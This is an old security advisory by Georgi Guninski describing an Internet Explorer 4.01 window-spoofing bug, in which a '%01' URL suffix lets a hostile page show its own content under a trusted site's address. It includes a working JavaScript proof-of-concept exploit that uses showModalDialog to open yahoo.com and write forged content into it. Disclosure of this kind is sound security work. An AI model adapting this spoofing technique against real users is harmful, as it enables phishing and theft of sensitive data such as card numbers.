Guninski's IE 4 window spoofing.
http://www.geocities.com/ResearchTriangle/1711/read4.html

There is a bug in Internet Explorer 4.01 (patched) which allows "window spoofing".

The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.

This circumvents "Cross-frame security" and opens several security holes.

After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site.
However, the content of the window is not that of the original site, but it is supplied by the owner of the page.
So, the user is mislead he is browising a trusted site, 
while he is browsing a hostile page and may provide sensitive information, such as credit card number.

The bug may be exploited using HTML mail message. The exploit uses Javascript. 

Workaround: Disable Javascript.

Written by http://www.geocities.com/ResearchTriangle/1711 - Georgi Guninski


Exploit code
------------
<SCRIPT>

alert('A window will be open. Examine the location and the content.\nThis may also be done by clicking a link.')
b=showModalDialog("about:<SCRIPT>a=window.open('http://www.yahoo.com');a.document.write('<HTML><HEAD><TITLE>Yahoo</TITLE><BODY></HEAD><H1>Look at the address bar!<BR>');a.document.write('<A HREF=\"http://www.geocities.com/ResearchTriangle/1711\">Go to Georgi Guninski\\'s home page</A></H1></BODY></HTML>');close()</"+"SCRIPT>%01http://www.yahoo.com");

</SCRIPT>